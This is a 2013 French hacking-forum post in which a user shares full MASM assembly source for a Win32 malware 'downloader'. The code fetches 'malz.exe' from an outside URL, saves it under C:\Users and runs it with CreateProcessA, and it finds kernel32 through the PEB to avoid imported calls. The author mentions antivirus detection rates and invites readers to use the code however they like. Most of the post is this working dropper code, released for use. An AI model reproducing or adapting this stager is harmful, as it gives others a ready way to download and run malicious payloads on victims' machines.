Vous êtes au niveau: Accueil / N-PN White-Hat Project / Programmation / Langages compilés / [MASM]Win32.Downloader






  • STATISTIQUES
  • Il y a eu un total de 0 membres et 2255 visiteurs sur le site dans les dernières 24h pour un total de 2 255 personnes!
    Membres: 2 605
    Discussions: 3 579
    Messages: 32 816
    Tutoriels: 78
    Téléchargements: 38
    Sites dans l'annuaire: 58


  • ANNUAIRE
  • [FR] Secuser
    Actualité de la sécurité informatique, fiches virus et hoax, alertes par email, antivirus gratui...
    Hacking
    [FR] Zenk-Security
    La communauté zenk-security a pour objet principal la sécurité informatique, nous sommes des tou...
    Hacking
    [EN] hax.tor
    50 level de challenges mélangés
    Challenges
    [FR] µContest
    µContest est un site de challenges de programmation, c'est à dire qu'il propose des épreu...
    Hacking
    [EN] CS Tutoring Center
    Site de challenge spécialisé dans les challenges de programmation C++ et java cependant, d'autres langages pe...
    Challenges
    [EN] Listbrain Version 3
    Site proposant 66 challenges présentés dans une liste mélangée.
    Challenges
    [FR] Microcontest
    Cryptographie: 7, Mathématiques: 8, Image Son Vidéo: 5, Intelligence artificielle: 3, Réseau: 2, Divers: 7, Phy...
    Challenges

  • DONATION
  • Si vous avez trouvé ce site internet utile, nous vous invitons à nous faire un don du montant de votre choix via Paypal. Ce don servira à financer notre hébergement.

    MERCI!




Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
Affichage linéaire
[MASM]Win32.Downloader
02-11-2013, 05h53 (Modification du message : 02-11-2013, 14h16 par EpicOut.)
Message : #1
EpicOut Hors ligne
Banni



Messages : 121
Sujets : 10
Points: 22
Inscription : Feb 2012
[MASM]Win32.Downloader
Hello, voici un downloader méga simple que j'ai fait via MASM, je l'ait fait pour le fun et pas pour faire chier des gens avec des malwares de merde, faites en ce que vous voulez, j'en ai rien à foutre, sous WTFPL, il est à 16/48 (plus maintenant, je l'ai scanné avec vt), si vous avez des questions sur son fonctionnement ou autre, n'hésitez pas à me mp, j'suis dispo.

Code :
.386
.model flat, stdcall
option casemap :none  ; case sensitive

include windows.inc

include kernel32.inc
includelib kernel32.lib

assume fs:nothing
.data
ExeFile db "http://www.epicworld.fr/malz.exe",0
PathTarget db "C:\Users\malz.exe",0
LpStartup STARTUPINFO <>
ProcessInfo PROCESS_INFORMATION <>
dll1 db "urlmon.dll",0
dllfunc1 db "URLDownloadToFileA",0
dllfunc2 db "CreateProcessA",0
signature db "Downloader by EpicOut - 2013",0
.data?
hModule dd ?
.code
start:
call download
call execute
call exit

download:
invoke LoadLibrary,addr dll1
invoke GetProcAddress,eax,addr dllfunc1
push NULL
push 0
push offset PathTarget
push offset ExeFile
push NULL
call eax
ret

execute:
call get_kernel32
invoke GetProcAddress,hModule,addr dllfunc2
push offset ProcessInfo
push offset LpStartup
push NULL
push NULL
push NULL
push TRUE
push NULL
push NULL
push NULL
push offset PathTarget
call eax
ret

exit:
invoke ExitProcess,0
ret

get_kernel32:
xor eax, eax
mov eax, fs:[30h]
mov eax, [eax+0Ch]
mov eax, [eax+0Ch]
mov ecx,2
loop_:
mov eax, [eax]
loop loop_
mov eax, [eax+18h]
mov hModule,eax
xor eax, eax
ret
end start
+1 (3) -1 (0) Répondre


Messages dans ce sujet
[MASM]Win32.Downloader - par EpicOut - 02-11-2013, 05h53
RE: [MASM]Win32.Downloader - par sakiir - 02-11-2013, 11h02
RE: [MASM]Win32.Downloader - par EpicOut - 02-11-2013, 11h07
RE: [MASM]Win32.Downloader - par sakiir - 02-11-2013, 13h57
RE: [MASM]Win32.Downloader - par EpicOut - 02-11-2013, 14h06
RE: [MASM]Win32.Downloader - par sakiir - 02-11-2013, 17h10

Sujets apparemment similaires…
Sujet Auteur Réponses Affichages Dernier message
  [MASM] Extracteur de dll pour Backdoor.Win32.Papras Horgh 10 766 25-04-2013, 13h41
Dernier message: Kiwazaru
  [C] [Win32] Injection de DLL dans un process avant son initialisation supersnail 4 510 26-03-2013, 23h27
Dernier message: fr0g

Atteindre :


Utilisateur(s) parcourant ce sujet : 3 visiteur(s)
N-PN
Accueil | Challenges | Tutoriels | Téléchargements | Forum | Retourner en haut